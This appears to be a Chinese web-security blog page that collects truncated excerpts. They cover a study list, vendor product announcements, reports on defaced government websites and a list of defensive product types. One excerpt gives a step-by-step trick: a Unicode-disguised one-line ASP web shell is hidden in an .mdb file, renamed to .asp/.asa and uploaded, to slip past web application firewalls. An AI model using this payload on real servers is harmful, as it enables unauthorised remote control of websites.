标签： 网站安全

　　游侠 www.youxia.org 在华安论坛看到noless的一个学习Web安全的计划，感觉不错，贴在博客，学习Web安全的兄弟们可以参考。
-----------------------------------
标题为Web安全学习计划，实属我的愿望：将下面这份Web学习清单完善成为一个Web安全，学习计划指导性帖子。

说明：本来打算给自己设计一个详细的学习计划，但是发现这些学习内容罗列出来后，发现这是个很庞大的系统，一时不知该如何来安排时间（自已把自己杯具了~~）。那就暂时成了如下的一个学习清单列表。发表出来，希望看看大家的建议。想成学习计划虽为私心，但如果修改得好也是一个福利大多想学习Web安全的朋友的一个机会。
...

　　网站安全监测系统抛弃传统的单纯依靠硬件或软件产品进行网站防护的思路，而是提出“预防为主，应急为辅”的新的网站安全防护观念。系统采用C/S架构，由网站端和实时监测平台组成。结合网站端自动安全防护和监测端实时监测，对网站异常提供双重保护，在应用层拦截针对网站的各种攻击，实时监测、及时告警。

现在有不少服务器加了web的防火墙，用来过滤含asp/jsp/php的网马代码，全部用空格替换，
比较讨厌，不过后来刚好想到以前的一句话时候的unicode编码，那就也搞一个吧。

1.新建一个mdb
2.建表，考入：┼攠數畣整爠煥敵瑳∨≡┩> nbsp;
　（实际是<% execute request("a")%>）
3.改后缀为asp/asa
4.上传
5.一句话客户端或者菜刀连接

FROM http://hi.baidu.com/it_security/blog/item/976f6ddbbce719d5b6fd4882.html...

　　1操作系统安全加固

　　在操作系统底层利用信任链机制，对系统中所有装载的可执行文件代码（例如，EXE、DLL、SYS、COM等）进行严格的控制，所有可执行文件代码在加载运行之前都需要先经过检验，只有通过验证的代码才可以加载，这种方式可以有效阻止恶意代码的运行，从而有效保障操作系统自身的完整性和可用性不被破坏。

　　验证方法为：首先为系统制定可信白名单，即允许执行代码的hash，在进程装载二进制代码之前首先计算其hash值，并与可信白名单进行比较，不在白名单中的一概不允许执行，这样既可以防止恶意代码运行，又可以防止恶意代码依附其他系统或应用程序运行，确保执行代码的真实性和完整性，同时效率上不会有明显影响。
...

　　日前有媒体报道，截至今年5月份，我国大陆地区被篡改网站的数量为2748个，其中代号为“Fatal”、“HEXB00T3R”和“aGReSiF”的攻击者对大陆政府网站进行了大量篡改。我国香港被篡改的网站数量为30个，较4月份增长了9个;我国台湾被篡改的网站数量为44个，较4月份增长了35个……

　　相信面对如此近乎疯狂的网络攻击行为，各网站也都采取了必要的安全防护措施，但为何采取防护措施的

　　1、什么叫Web应用系统？

　　答：Web应用系统就是利用各种动态Web技术开发的，基于B/S（浏览器/服务器）模式的事务处理系统。用户直接面对的是客户端浏览器，使用Web应用系统时，用户通过浏览器发出的请求，其之后的事务逻辑处理和数据的逻辑运算由服务器与数据库系统共同完成，对用户而言是完全透明的。运算后得到的结果再通过网络传输给浏览器，返回给用户。比如：ERP系统、CRM系统以及常见的网站系统（如电子政务网站、企业网站等）都是Web应用系统。

　　2、Web威胁为什么难以防范

　　答：针对Web的攻击已经成为全球安全领域最大的挑战，主要原因有如下两点：
...

　　长期以来，很多单位和部门的网站深受木马毒害，并时常遭到黑客的无情篡改，由于网站是对外传播的第一门面，因此，网站安全始终是悬在网络中心管理员头上的一把利剑!

　　难道网站安全真的就不能让人放心无忧吗?

　　当然可以!

　　日前，国内领先的网络设备及解决方案提供商锐捷网络推出了门户网站安全守护神——RG-WG系列锐捷webGuard应用保护系统，弥补了传统网站安全防护机制漏洞，把

　　中新社北京5月18日电 来自国家互联网应急中心18日的报告显示，5月10日至5月16日一周内，中国境内有81个政府网站被篡改，这一数据环比下降了35%。

　　根据监测，至5月17日12时，仍有29个被篡改的政府网站没有恢复，其中包括4个省部级网站，分别位于安徽、江苏、四川和西藏自治区，另外还有25个地市级政府网站。

　　这些数据显示，政府网站的安全意识和安全措施有待加强。不过，政府网站被篡改的数量呈降低趋势。5月2日至5月9日一周，中国124家政府网站被篡改。

　　根据监测，针对政府、企业以及互联网用户的主要安全威胁来自于软件高危漏洞、恶意代码传播活动以及网页篡改。
...

　　政府门户网站是“政务公开”和“服务型政府”两大主导思想，在落实过程中所必须凭借的重要平台，在未来的电子政务规划中，政府门户网站必将占有非常重要的地位。国家正在逐步推进信息安全等级保护工作，这一国家层面的信息安全标准，已成为未来在电子政务安全建设中的重要保障。

　　绿盟科技特别推出的“政府门户网站等级保护解决方案”以业界最为出色的技术底蕴和对等级保护的深刻理解，为政府客户最需要保障之处，

　　日前，绿盟科技正式宣布，绿盟远程安全评估系统（原“极光”远程安全评估系统，简称NSFOCUS RSAS）针对Web应用安全检查的需求，隆重推出专业的Web应用扫描模块。
　　全新的NSFOCUS RSAS产品Web扫描功能，综合应用了很多业内领先的技术，如模拟点击智能爬虫技术、主动挂马检测及核心调度引擎，为用户提供精准的检测结果及最高效的检测效率。可以应用于网站管理员进行Web上线前安全测试、上线后周期性安全评估以及企业安全管理员进行统一的风险监控与管理。
　　绿盟科技安全专家介绍，相比传统Web扫描器仅局限于提供Web应用层的漏洞扫描，该产品能够为Web应用系统提供最为全面的漏洞检测范围，包含Web应用（SQL注入漏洞、跨站脚本漏洞、CGI漏洞，以及网页挂马等漏洞）、Web 服务及支撑系统（网络层、操作系统层、数据库）等多层次全方位的安全漏洞扫描、审计、渗透测试和辅助逻辑分析。
...

　　随着网站安全形势的日益严峻，如何保障用户上网安全越来越受到重视。近日，国内信息安全领导厂商启明星辰对全球最大中文搜索引擎百度提供了完整的网站安全服务，在线的所有网页进行全面的网站检查及渗透测试，以保障百度网民的安全访问。
　　此次合作对百度在线众多域名下的几百万网页做一次全面的WEB安全检查。为在当前网站安全事件频繁的敏感时期，做好自主的安全风险掌控，防范于未然。启明星辰专门组织了积极防御实验室（ADLAB）的攻防专家和安星WEB安全服务团队的服务专家，共同参与和实施本次项目。安星是启明星辰在奥运前期推出的标准化安全服务化产品，全面检测网站挂马和WEB安全漏洞，为奥运保障做出了重要贡献。在这一项目中，安星团队负责对百度在线进行了全面的安全普查，攻防专家则针对安星团队发现的问题进行深入挖掘和渗透，做到深度与广度的有效结合，保障了本次网站安全服务的质量和进度。另外，启明星辰专门针对网站、电视台、电台、数字出版及有线网络行业而成立了媒体事业部，这一团队在互联网领域和web安全方面具有丰富的经验和成功案例。
...

相信圈子里面的朋友都知道WebRavor了，如果你不知道WebRavor，你总该知道大名鼎鼎的“流光Fluxay”吧？——是的，Fluxay和WebRavor出自一人之手——小榕。

一般来说，政府的网站不会有人去恶意篡改
但是……对于很多“hacker”而言，顾不得这么多
比如下面这个图

就是今天：2009年06月26日，被入侵的几个政府网站
多数人还是很忌讳篡改政府网站的
也有个问题：60年大庆将至，如何保障政府网站安全？
游侠感觉挺担心，毕竟整体环境并不很重视信息安全
对于很多WEB安全公司而言，卖产品是主要的
服务，始终在中国也普遍没当作一项收费项目做起来
而如果免费，效果不好也理所当然……

群里面和朋友聊天的时候有哥们说一般用Unix+WebLogic比较保险吧？
其实，安全从来都是相对的，我们看下图：

看到了？漏洞并不少

游侠记得以前zone-h的统计，被黑网站绝大多数是Unix/Linux
大约占到总体被黑网站系统的百分之九十

　　===========================================
　　WEB安全
　　www.youxia.org
　　===========================================

　　1 抗DoS/DDoS产品
　　2 整体漏洞扫描产品
　　3 网站脆弱性评估产品
　　4 服务器加固
　　　　4.1 操作系统加固
　　　　4.2 数据库加固
　　5 数据库脆弱性评估
　　6 数据库审计
　　7 SOC平台实时监控
　　8 网站木马检测
　　9 网站防篡改系统
　　10 代码审计
　　　　10.1 asp
　　　　10.2 php
　　　　10.3 jsp
　　11 IPS入侵防御
　　12 IDS入侵检测
　　13 WEB应用防火墙
　　14 防火墙
　　===========================================
　　网路游侠 QQ：55984512 提供网站安全整体解决方案。
　　===========================================
2009年06月21日 网友“无心喃呢”建议，增加“以人为本”